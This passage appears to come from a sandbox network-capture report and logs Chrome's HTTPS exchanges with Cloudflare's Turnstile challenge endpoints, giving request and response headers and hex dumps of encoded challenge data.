                                                  2024-12-09 08:34:54 UTC1369INData Raw: 64 32 79 6f 71 47 39 37 72 4b 79 72 68 4b 6d 41 64 49 56 79 69 36 6c 2b 71 61 69 30 69 33 71 63 74 4c 56 2f 67 61 6a 42 6f 4d 69 6d 67 49 69 38 6e 4d 61 50 76 73 36 4d 6c 4b 69 52 70 74 71 35 6d 37 75 34 74 62 69 68 6f 4e 36 35 6e 71 47 31 75 4c 50 65 76 70 2b 73 76 75 61 39 33 38 48 54 76 75 2b 75 36 76 6e 6a 33 4d 2f 64 31 76 65 2f 33 77 4c 4d 42 76 33 75 41 4d 58 58 42 2b 72 55 33 75 50 71 33 76 48 6a 42 74 2f 64 43 75 77 5a 35 42 50 34 30 67 38 67 33 78 33 58 41 65 4d 4f 49 52 76 77 4a 50 54 71 43 69 62 31 42 69 6e 75 43 44 4d 77 48 67 54 74 4b 77 77 52 2b 6a 30 4c 50 53 6f 71 2f 45 45 2f 2b 6a 6c 42 2b 44 55 2b 46 2f 77 6a 2f 69 41 5a 4c 54 41 6d 52 6b 63 6d 54 44 5a 4f 53 42 68 63 4c 79 68 52 47 6c 67 79 4c 31 70 4e 50 46 4a 47 53 42 39 49 4e 7a 56
                                                  Data Ascii: d2yoqG97rKyrhKmAdIVyi6l+qai0i3qctLV/gajBoMimgIi8nMaPvs6MlKiRptq5m7u4tbihoN65nqG1uLPevp+svua938HTvu+u6vnj3M/d1ve/3wLMBv3uAMXXB+rU3uPq3vHjBt/dCuwZ5BP40g8g3x3XAeMOIRvwJPTqCib1BinuCDMwHgTtKwwR+j0LPSoq/EE/+jlB+DU+F/wj/iAZLTAmRkcmTDZOSBhcLyhRGlgyL1pNPFJGSB9INzV
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 57 36 4c 66 37 69 44 71 71 75 34 71 6f 32 6f 71 49 32 78 76 33 32 30 6d 48 79 34 6e 37 65 64 75 4d 61 65 76 71 4b 5a 77 6f 7a 53 6c 4e 47 57 6b 72 43 35 6f 74 62 55 74 4d 79 59 31 37 69 76 6d 37 2f 56 74 37 6e 5a 74 65 53 2f 6f 37 33 71 36 4b 37 6b 34 72 76 6e 35 4f 76 54 36 37 6e 6a 32 76 44 53 33 75 44 2b 75 50 66 53 77 4f 4c 76 32 75 58 67 2b 2f 33 31 35 50 6a 61 34 2b 66 63 30 65 2f 53 43 78 4d 58 46 73 7a 55 39 4e 54 7a 37 76 76 39 33 75 30 62 41 68 44 33 35 65 6a 35 46 2b 6a 6f 43 4f 6b 5a 48 41 34 72 46 51 49 48 44 52 6a 72 43 67 55 36 4f 53 77 34 45 6a 4d 69 49 51 55 57 52 45 6b 41 50 67 56 48 54 51 77 6d 44 67 74 43 4d 69 45 51 54 56 51 6a 46 53 39 4d 4c 44 73 59 53 44 51 67 4e 45 78 56 59 32 45 79 50 46 59 69 49 6d 4d 6a 5a 31 74 4b 50 6d 41 2f
                                                  Data Ascii: W6Lf7iDqqu4qo2oqI2xv320mHy4n7eduMaevqKZwozSlNGWkrC5otbUtMyY17ivm7/Vt7nZteS/o73q6K7k4rvn5OvT67nj2vDS3uD+uPfSwOLv2uXg+/315Pja4+fc0e/SCxMXFszU9NTz7vv93u0bAhD35ej5F+joCOkZHA4rFQIHDRjrCgU6OSw4EjMiIQUWREkAPgVHTQwmDgtCMiEQTVQjFS9MLDsYSDQgNExVY2EyPFYiImMjZ1tKPmA/
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 75 6e 65 35 6d 4b 71 61 47 64 76 34 33 41 6c 6f 4e 2b 6d 4d 53 66 6e 38 69 6c 75 59 79 5a 6d 38 36 69 77 73 66 45 6f 71 47 74 79 4b 65 30 6c 4c 71 71 33 74 62 4c 6c 64 4b 7a 76 62 7a 47 6f 37 71 36 35 65 32 73 36 61 4c 6d 33 39 2b 78 72 4e 37 34 31 65 50 30 2f 4f 76 52 38 67 48 31 36 76 54 36 77 74 54 63 33 39 50 66 34 38 6e 2b 33 4f 76 2b 43 51 48 61 42 41 2f 4e 42 4f 2f 67 43 50 58 76 46 39 76 57 43 78 7a 77 48 65 41 52 4a 78 48 65 46 41 6b 6f 36 53 67 72 45 4f 6b 74 2f 43 76 73 49 54 66 31 36 54 55 76 47 50 48 38 4e 78 70 41 39 6b 4d 77 42 44 4a 44 4d 51 4d 67 50 7a 59 43 41 7a 39 45 43 43 67 74 53 41 5a 42 49 55 78 5a 56 6c 74 48 46 54 4e 66 57 68 5a 65 50 57 4d 62 47 31 64 50 61 53 6b 67 5a 53 70 44 57 44 63 75 52 58 4d 74 50 58 42 6e 62 7a 51 72 4d
                                                  Data Ascii: une5mKqaGdv43AloN+mMSfn8iluYyZm86iwsfEoqGtyKe0lLqq3tbLldKzvbzGo7q65e2s6aLm39+xrN741eP0/OvR8gH16vT6wtTc39Pf48n+3Ov+CQHaBA/NBO/gCPXvF9vWCxzwHeARJxHeFAko6SgrEOkt/CvsITf16TUvGPH8NxpA9kMwBDJDMQMgPzYCAz9ECCgtSAZBIUxZVltHFTNfWhZePWMbG1dPaSkgZSpDWDcuRXMtPXBnbzQrM
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 4b 66 70 75 34 66 59 53 59 70 4b 4b 59 6e 73 7a 44 7a 62 66 42 6f 71 43 6c 72 73 2b 7a 71 36 50 45 71 4b 69 32 7a 35 57 7a 6d 71 71 71 7a 4a 36 68 35 4e 61 6a 30 62 50 59 75 4c 62 75 32 65 62 5a 77 75 4c 45 76 72 50 50 78 2b 7a 45 35 4e 76 33 38 64 6a 4d 34 51 44 56 39 64 4c 2b 32 2f 72 70 41 74 30 4d 36 51 33 6b 78 2f 48 76 35 65 2f 74 47 41 4c 6b 34 74 63 49 45 2b 33 64 44 39 72 54 38 41 77 61 35 53 51 56 48 76 4c 30 46 51 77 6f 49 67 6e 38 45 6a 41 47 4a 67 4d 76 44 43 73 61 4d 67 34 38 47 6a 30 56 39 79 49 67 46 69 41 65 53 44 49 5a 4d 68 6b 37 47 30 55 46 50 79 78 52 47 30 42 4b 54 69 5a 48 54 56 49 6f 53 79 73 65 57 54 68 56 47 69 45 31 51 54 38 31 4f 32 6c 67 61 6c 52 65 50 7a 31 43 53 32 78 51 53 45 42 68 52 55 56 54 62 44 4a 51 4e 30 68 4f 62 33
                                                  Data Ascii: Kfpu4fYSYpKKYnszDzbfBoqClrs+zq6PEqKi2z5WzmqqqzJ6h5Naj0bPYuLbu2ebZwuLEvrPPx+zE5Nv38djM4QDV9dL+2/rpAt0M6Q3kx/Hv5e/tGALk4tcIE+3dD9rT8Awa5SQVHvL0FQwoIgn8EjAGJgMvDCsaMg48Gj0V9yIgFiAeSDIZMhk7G0UFPyxRG0BKTiZHTVIoSyseWThVGiE1QT81O2lgalRePz1CS2xQSEBhRUVTbDJQN0hOb3
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 71 4b 72 45 75 6f 65 71 68 4c 33 47 76 5a 72 43 79 72 61 4d 78 70 48 5a 71 63 6e 52 6a 36 6e 4f 6d 36 75 76 30 63 54 56 74 74 43 34 31 4b 44 5a 76 4c 2b 34 33 65 62 64 77 75 47 76 34 50 44 6d 37 75 58 44 36 64 7a 74 7a 4f 33 32 33 38 33 7a 30 67 62 55 39 74 6a 66 31 50 6a 48 34 39 67 41 34 4f 2f 62 2f 4f 54 39 33 77 66 34 43 75 59 4b 37 50 4c 55 44 78 63 4e 48 52 4d 62 37 2f 51 59 2b 41 6a 36 47 79 4d 49 2f 52 2f 70 4d 67 41 6a 4b 77 76 73 4a 68 6b 59 43 79 6f 4e 4c 67 38 70 45 53 41 51 4d 78 55 63 45 44 59 2f 4a 42 51 36 4c 54 6c 4a 50 7a 45 6f 49 6b 4a 4c 52 69 46 47 46 43 51 71 53 6a 74 65 4c 45 35 58 55 6a 4e 54 52 54 77 31 56 6a 6c 61 4e 31 55 39 53 44 39 64 4c 45 77 2b 59 6c 56 68 4c 57 68 49 4f 6e 56 72 63 30 78 4b 62 31 46 71 55 48 4e 6c 59 46 4e
                                                  Data Ascii: qKrEuoeqhL3GvZrCyraMxpHZqcnRj6nOm6uv0cTVttC41KDZvL+43ebdwuGv4PDm7uXD6dztzO32383z0gbU9tjf1PjH49gA4O/b/OT93wf4CuYK7PLUDxcNHRMb7/QY+Aj6GyMI/R/pMgAjKwvsJhkYCyoNLg8pESAQMxUcEDY/JBQ6LTlJPzEoIkJLRiFGFCQqSjteLE5XUjNTRTw1VjlaN1U9SD9dLEw+YlVhLWhIOnVrc0xKb1FqUHNlYFN
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 72 6d 2b 69 4c 71 64 6a 71 57 54 6f 72 61 5a 31 4b 6a 4c 6c 4c 69 74 6d 61 48 63 73 4b 32 63 77 4c 57 68 71 65 53 31 34 65 66 48 32 4c 6a 6f 73 4d 7a 54 76 63 6a 67 79 4e 72 33 79 65 37 61 2f 4d 6e 30 41 74 48 79 34 73 54 75 34 4f 66 52 33 50 54 63 39 64 7a 34 79 52 41 4a 41 4d 76 32 46 65 45 4e 47 50 45 47 44 4f 55 48 43 75 6e 75 49 2b 34 6b 48 50 34 53 47 50 59 6f 46 65 55 73 41 52 77 76 4c 53 33 39 37 6a 41 4c 49 51 45 35 2b 41 63 62 50 42 51 73 39 79 4e 42 44 7a 6c 45 47 44 45 43 53 43 45 34 53 77 35 4a 47 77 74 4d 4b 7a 30 65 48 78 55 6b 4e 31 67 30 53 42 51 2f 58 53 6f 2f 59 46 6c 4e 5a 6d 42 45 4e 30 6c 59 56 46 67 6b 54 32 30 38 54 33 42 51 51 31 56 6b 59 47 45 79 65 46 68 4c 58 57 68 6f 62 44 68 6a 67 56 42 54 68 47 52 58 61 58 52 30 64 55 61 4d
                                                  Data Ascii: rm+iLqdjqWToraZ1KjLlLitmaHcsK2cwLWhqeS14efH2LjosMzTvcjgyNr3ye7a/Mn0AtHy4sTu4OfR3PTc9dz4yRAJAMv2FeENGPEGDOUHCunuI+4kHP4SGPYoFeUsARwvLS397jALIQE5+AcbPBQs9yNBDzlEGDECSCE4Sw5JGwtMKz0eHxUkN1g0SBQ/XSo/YFlNZmBEN0lYVFgkT208T3BQQ1VkYGEyeFhLXWhobDhjgVBThGRXaXR0dUaM


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.449773104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:55 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:56 UTC379INHTTP/1.1 404 Not Found
                                                  Date: Mon, 09 Dec 2024 08:34:56 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 7
                                                  Connection: close
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  cf-chl-out: 7u6cPorpNbRZRBSJ7XJNy2xBWokZKVoEkbA=$r0ukT1wXfqpeRAre
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8ad9cf58cb7-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                  Data Ascii: invalid


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.449774104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:05 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 33988
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  Content-type: application/x-www-form-urlencoded
                                                  CF-Chl-RetryAttempt: 0
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  CF-Challenge: .jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Origin: https://challenges.cloudflare.com
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:05 UTC16384OUTData Raw: 76 5f 38 65 66 33 61 38 35 62 37 62 66 65 30 66 61 37 3d 66 72 61 56 4a 71 31 74 44 71 44 7a 72 55 74 2d 30 42 55 68 56 48 37 4e 2d 31 6c 71 5a 55 4e 55 66 61 71 4d 6e 55 6e 56 53 69 64 37 38 32 55 66 56 54 61 38 6e 55 77 54 32 55 38 75 56 55 33 48 55 39 56 55 24 55 6f 70 31 55 31 49 55 54 67 37 5a 61 55 7a 2d 31 31 55 35 61 31 68 55 6c 39 4a 30 25 32 62 24 47 56 55 69 69 55 35 36 75 37 55 64 56 38 7a 6b 49 55 6c 2b 41 55 66 75 31 7a 30 71 32 38 37 31 70 55 70 2d 55 34 55 55 36 48 75 77 32 55 31 73 6c 4e 65 43 6f 53 67 49 55 55 73 67 54 32 37 2b 51 4f 64 6a 54 37 55 4f 54 43 42 72 45 7a 70 43 54 4d 67 61 4b 58 24 72 35 4f 30 64 33 47 65 6d 78 75 75 55 75 4d 67 43 34 64 65 59 35 6c 57 46 68 24 6f 42 41 77 61 54 39 2b 57 32 33 65 44 6e 56 59 6f 43 7a 49 54
                                                  Data Ascii: v_8ef3a85b7bfe0fa7=fraVJq1tDqDzrUt-0BUhVH7N-1lqZUNUfaqMnUnVSid782UfVTa8nUwT2U8uVU3HU9VU$Uop1U1IUTg7ZaUz-11U5a1hUl9J0%2b$GVUiiU56u7UdV8zkIUl+AUfu1z0q2871pUp-U4UU6Huw2U1slNeCoSgIUUsgT27+QOdjT7UOTCBrEzpCTMgaKX$r5O0d3GemxuuUuMgC4deY5lWFh$oBAwaT9+W23eDnVYoCzIT
                                                  2024-12-09 08:35:05 UTC16384OUTData Raw: 55 6c 55 70 6c 55 55 70 76 4a 69 24 75 74 56 49 51 6c 6c 38 43 45 44 55 72 76 52 56 71 30 31 58 75 51 75 55 49 31 77 24 64 48 6c 24 55 6b 62 38 62 36 55 55 4e 75 78 55 6c 75 31 24 55 7a 75 6c 7a 31 6d 55 52 55 71 4d 31 69 55 7a 55 6c 7a 55 55 55 6f 75 4c 45 43 55 6f 2d 71 61 55 7a 54 64 37 38 2d 55 35 55 4c 56 38 72 55 45 55 4f 75 55 24 31 4b 6c 48 75 70 30 55 66 55 7a 75 53 41 55 76 55 75 37 53 7a 55 52 61 2d 75 6c 2b 55 4c 55 31 37 71 74 31 6f 55 38 37 31 46 55 36 55 74 77 6c 31 56 67 75 2d 75 53 46 55 61 55 54 55 6f 62 76 2d 55 65 55 31 75 31 41 55 55 37 6c 6c 31 24 55 44 56 6c 42 31 7a 55 6d 55 54 61 55 42 55 2d 56 55 37 65 4a 6a 6d 56 70 24 31 42 55 24 75 38 6c 55 65 55 43 54 6e 30 31 58 55 30 56 43 44 38 76 55 71 46 4e 2b 55 6e 55 5a 37 55 6d 31 47
                                                  Data Ascii: UlUplUUpvJi$utVIQll8CEDUrvRVq01XuQuUI1w$dHl$Ukb8b6UUNuxUlu1$Uzulz1mURUqM1iUzUlzUUUouLECUo-qaUzTd78-U5ULV8rUEUOuU$1KlHup0UfUzuSAUvUu7SzURa-ul+ULU17qt1oU871FU6Utwl1Vgu-uSFUaUTUobv-UeU1u1AUU7ll1$UDVlB1zUmUTaUBU-VU7eJjmVp$1BU$u8lUeUCTn01XU0VCD8vUqFN+UnUZ7Um1G
                                                  2024-12-09 08:35:05 UTC1220OUTData Raw: 55 30 32 4f 24 55 52 69 4b 78 65 6e 55 53 75 6a 6c 59 30 55 68 32 59 39 70 6a 4c 64 7a 5a 55 71 37 31 77 55 43 59 52 59 4f 54 35 78 6c 70 45 5a 67 56 61 41 2d 77 45 4e 56 61 31 5a 65 47 59 67 37 54 63 30 63 65 44 70 52 43 57 55 72 6c 42 4d 6a 75 4c 37 46 38 63 4c 7a 55 67 56 78 79 70 53 4f 48 46 32 56 38 49 42 43 48 37 58 75 7a 4e 69 2b 6c 2d 59 53 4f 65 65 62 4d 38 6c 61 71 55 66 74 48 37 55 4a 73 68 43 32 6c 35 67 56 69 56 63 70 69 74 79 79 45 2b 2b 41 24 46 6b 2d 44 49 69 38 56 6d 41 76 59 42 64 75 33 37 38 58 38 6f 7a 32 6b 37 64 6f 32 32 44 56 55 46 34 6b 55 69 44 73 6d 35 53 2d 4d 75 53 75 5a 51 39 55 57 2b 6b 4e 37 24 54 37 4e 24 42 6f 61 65 75 4e 65 55 46 55 6d 55 61 49 31 33 61 48 66 57 2b 34 72 56 72 74 6f 36 5a 6d 56 55 32 55 71 55 70 61 24 5a
                                                  Data Ascii: U02O$URiKxenUSujlY0Uh2Y9pjLdzZUq71wUCYRYOT5xlpEZgVaA-wENVa1ZeGYg7Tc0ceDpRCWUrlBMjuL7F8cLzUgVxypSOHF2V8IBCH7XuzNi+l-YSOeebM8laqUftH7UJshC2l5gViVcpityyE++A$Fk-DIi8VmAvYBdu378X8oz2k7do22DVUF4kUiDsm5S-MuSuZQ9UW+kN7$T7N$BoaeuNeUFUmUaI13aHfW+4rVrto6ZmVU2UqUpa$Z
                                                  2024-12-09 08:35:06 UTC1343INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 4504
                                                  Connection: close
                                                  cf-chl-out-s: dGLMr6zzXSbhBqwAK6XuutXNx5a/HvvKm40vEgwWi6ACErR1gGQL419NYVBqcwhj23RYg/twFQa18WggTAB7SZ8jxpHqEzktQwWbv5hdCT59hKG1O8Ya63LhIJmFSEx/BX0Jcl7fGNie8H4aq+w0BYlcc8l91vuejUu/oZfTZpGLIwfV/i8arqIAp4UZxlyr1elwhb5lt+kw9L6Xa1xyD58rdmZ9tgumnm6GgcSutKIHhsV4bUPkO/oR2/B5HcFIq35uPsnIw2QZUHkxEeWbgWhmSqL+geawhcQvyeZH7jZoqTiTE1bzFy6hlgDuFZaG19vwAt+5ZEXPs7v1GFpbVxg5KpYiSEkr0YwLyB+Xn8Qzh2US3593GsbuI1smb+OAZvx0ydvx04OPmABGjqARVmdbeXyQ6g5CgPz/+Nn/Q/uhn76/pryxvXp6XMTIF647lC1jOvxcLJr3dUwz74pyB+5duV2VK+5UmNav1ZAkj1RvC6hUc9EOc+K0Jlosm8f3D3a9sobYP3egp42zTUtdX3D8JJctpSik4mtDk+K19tWgHgme1ha8uEiSPNvsnWCqx61GxAVPSg/YlzBxa9pCd7HuEdpdu1BFJqOqr3EWvdTO7a6JiY7+DHA0Tuz7pKeOpuRTXMfzOuG+aomR2+o91NgfBLAGiYFeg4nwehc1rwZgx8VdYp/vu22P/xnT2z4SqByNLM1oUpHr3pBROpgoWZaN0+hSsYJ1h3NbSdIckE/QBotG0ctXORpOyS2CMZUDxXpVm+7Q0m3nnPONrPWe1Qa273rK+kWwp8gthpYenskBKrbwgpoSdc4ljzTXezJbnmqyS7Lh88kArSwqLj/+bvNZX2DtoU2IQbj58FxZhAOqpaRYqECdVxuUmTeWf6P4BFZmMbAAKzeHfX57/92SKr7mfSszEh5qwApy0f+bkck3a7Di7H+s/WhsZgXF4Jb3HtFMDGwcnDTpFNGSwLwwdDs25l3eKmGsOPlX/B6ngJ8=$cQtpE [TRUNCATED]
                                                  cf-chl-out: JabBau8SuI+pqFjM+2kAk/SBUyvv77wqDa0D/RQWzNhHmqVHsmwXCs7W159ZQqg5toxRNhgTkuqu9MJExo+uQ36yGeXJgtOfZxanlj78QHEezLu221u4NvI=$flfaEAqcZ+ReKKir
                                                  Server: cloudflare
                                                  2024-12-09 08:35:06 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 65 66 33 61 38 65 39 31 62 30 63 37 64 31 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                  Data Ascii: CF-RAY: 8ef3a8e91b0c7d11-EWRalt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:35:06 UTC1333INData Raw: 6a 6c 6c 32 54 5a 4b 64 6b 57 35 34 6b 71 46 73 64 6f 2b 46 6c 58 35 35 71 58 64 34 69 58 36 75 6e 71 6c 6b 72 4a 53 79 64 70 4f 59 63 59 75 77 6d 37 43 76 6f 4c 53 32 6e 5a 32 6a 66 35 75 43 70 34 4f 66 77 37 58 41 6a 73 79 2b 78 37 76 4d 6b 63 57 2b 6c 61 53 6c 78 4c 71 70 33 4e 6d 35 31 63 47 30 75 37 65 68 34 73 54 59 33 2b 61 38 34 4f 62 4d 77 62 32 6e 35 4d 58 76 35 62 37 55 78 4e 47 35 32 65 37 6f 39 50 6e 30 7a 50 7a 41 32 77 53 2b 76 51 50 4a 2f 41 6a 2b 44 38 55 50 35 68 50 4e 44 2b 62 54 39 66 50 79 36 2f 62 56 39 50 6a 75 2b 66 66 38 46 75 7a 36 4a 2f 49 6f 35 2b 44 36 35 78 6b 41 48 77 77 5a 45 4f 34 46 42 42 51 4f 39 69 63 55 2b 53 6b 34 4e 67 38 4e 51 42 56 41 2f 42 30 45 42 67 49 52 41 7a 68 42 54 55 74 4e 55 53 77 75 44 54 34 6b 4d 69 51
                                                  Data Ascii: jll2TZKdkW54kqFsdo+FlX55qXd4iX6unqlkrJSydpOYcYuwm7CvoLS2nZ2jf5uCp4Ofw7XAjsy+x7vMkcW+laSlxLqp3Nm51cG0u7eh4sTY3+a84ObMwb2n5MXv5b7UxNG52e7o9Pn0zPzA2wS+vQPJ/Aj+D8UP5hPND+bT9fPy6/bV9Pju+ff8Fuz6J/Io5+D65xkAHwwZEO4FBBQO9icU+Sk4Ng8NQBVA/B0EBgIRAzhBTUtNUSwuDT4kMiQ
                                                  2024-12-09 08:35:06 UTC1369INData Raw: 32 39 36 56 31 52 65 59 6c 35 6b 64 6d 78 34 68 57 61 53 6b 45 35 6c 63 48 64 67 61 6d 47 52 59 33 52 58 63 6f 31 73 6b 57 70 6a 63 36 5a 6c 58 35 4e 30 6e 4b 70 35 6a 49 70 70 68 35 2b 6b 6b 49 4b 41 74 59 65 53 69 49 75 4a 70 35 65 31 69 4a 52 36 74 59 79 56 78 63 53 6e 6e 59 43 6d 7a 4a 32 6f 78 49 79 65 6e 4b 50 55 76 72 53 75 77 61 66 4c 73 35 61 79 33 62 37 4d 74 4c 33 51 6d 62 4c 45 77 74 33 53 6f 37 2f 73 78 72 6a 50 76 73 4c 6a 33 61 33 4b 77 4c 4b 77 78 74 4b 78 73 64 50 2b 30 76 66 4f 79 39 37 33 32 74 34 46 37 2f 4c 6a 30 75 6a 33 35 39 66 4a 36 4f 7a 4b 33 75 54 67 45 66 66 6c 47 78 4c 53 43 76 67 5a 49 66 50 77 37 68 7a 78 37 2f 4c 6e 2b 52 73 70 2f 66 33 33 4a 51 6f 47 41 51 38 51 43 67 55 48 37 68 49 46 45 2b 30 52 4c 78 67 4f 4c 68 30 62
                                                  Data Ascii: 296V1ReYl5kdmx4hWaSkE5lcHdgamGRY3RXco1skWpjc6ZlX5N0nKp5jIpph5+kkIKAtYeSiIuJp5e1iJR6tYyVxcSnnYCmzJ2oxIyenKPUvrSuwafLs5ay3b7MtL3QmbLEwt3So7/sxrjPvsLj3a3KwLKwxtKxsdP+0vfOy9732t4F7/Lj0uj359fJ6OzK3uTgEfflGxLSCvgZIfPw7hzx7/Ln+Rsp/f33JQoGAQ8QCgUH7hIFE+0RLxgOLh0b
                                                  2024-12-09 08:35:06 UTC1369INData Raw: 74 67 53 55 4e 6d 67 34 79 42 5a 6d 31 6b 6c 49 78 7a 6a 58 68 73 63 32 39 59 55 48 71 53 67 6c 39 39 6c 49 61 65 65 47 4b 52 71 48 2b 44 68 6f 4a 75 73 61 71 44 74 4b 71 47 69 5a 39 78 65 59 6d 37 64 4a 4f 33 6e 37 57 58 72 37 79 44 68 62 74 39 68 34 6d 37 70 73 4f 44 77 37 6d 50 7a 64 4c 41 6b 35 57 55 73 35 58 55 72 64 53 55 32 63 2f 54 6d 62 62 62 74 35 37 51 6f 4a 2b 6f 35 65 53 30 70 75 71 73 78 62 6d 78 37 2f 53 7a 38 2b 50 76 37 61 76 6d 35 4c 71 76 38 2b 33 30 77 64 48 67 77 67 49 45 35 4d 65 37 41 41 48 44 43 38 77 51 32 64 44 50 43 73 33 6d 7a 4e 48 50 47 41 73 53 30 39 30 66 44 4e 4c 58 33 41 30 6d 42 78 73 4a 33 68 59 63 33 53 49 46 36 66 6a 76 4c 51 4d 43 2f 54 4d 34 4c 2f 63 6e 46 68 59 79 45 7a 73 71 4e 6a 30 42 41 76 77 58 48 6a 38 49 41
                                                  Data Ascii: tgSUNmg4yBZm1klIxzjXhsc29YUHqSgl99lIaeeGKRqH+DhoJusaqDtKqGiZ9xeYm7dJO3n7WXr7yDhbt9h4m7psODw7mPzdLAk5WUs5XUrdSU2c/Tmbbbt57QoJ+o5eS0puqsxbmx7/Sz8+Pv7avm5Lqv8+30wdHgwgIE5Me7AAHDC8wQ2dDPCs3mzNHPGAsS090fDNLX3A0mBxsJ3hYc3SIF6fjvLQMC/TM4L/cnFhYyEzsqNj0BAvwXHj8IA
                                                  2024-12-09 08:35:06 UTC433INData Raw: 38 53 46 42 52 61 32 46 30 54 6c 56 59 63 6c 79 58 6b 6e 6c 67 59 47 43 52 59 58 79 61 6c 47 43 52 6c 35 64 6e 67 35 75 59 62 36 75 6f 67 33 52 31 6c 61 35 30 61 34 57 52 64 5a 36 52 6c 4d 42 2b 73 71 32 34 67 70 47 62 77 4a 72 48 6e 63 47 65 67 4d 58 49 6f 73 37 41 31 4d 33 43 77 4d 79 59 6b 37 7a 64 6d 73 75 32 34 62 58 61 7a 39 6a 47 33 74 7a 64 70 74 66 41 34 4b 7a 71 32 4f 58 6f 70 4e 7a 72 74 50 4c 6b 2b 65 48 46 30 76 44 6e 76 4e 54 34 30 2f 4c 35 42 67 41 44 2f 41 44 49 77 2f 6b 42 79 51 7a 6d 42 2b 58 4d 35 67 72 55 35 67 33 76 47 52 41 51 38 65 37 6d 49 66 49 53 33 66 54 35 48 69 50 6d 43 69 62 68 42 41 33 6d 2f 67 30 53 4d 66 6f 50 46 69 55 45 4c 42 6b 75 44 78 77 64 4d 69 6b 5a 44 6b 41 37 50 44 6f 45 51 6b 50 2b 47 51 55 72 49 52 38 2b 43 7a
                                                  Data Ascii: 8SFBRa2F0TlVYclyXknlgYGCRYXyalGCRl5dng5uYb6uog3R1la50a4WRdZ6RlMB+sq24gpGbwJrHncGegMXIos7A1M3CwMyYk7zdmsu24bXaz9jG3tzdptfA4Kzq2OXopNzrtPLk+eHF0vDnvNT40/L5BgAD/ADIw/kByQzmB+XM5grU5g3vGRAQ8e7mIfIS3fT5HiPmCibhBA3m/g0SMfoPFiUELBkuDxwdMikZDkA7PDoEQkP+GQUrIR8+Cz


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.449775104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:07 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
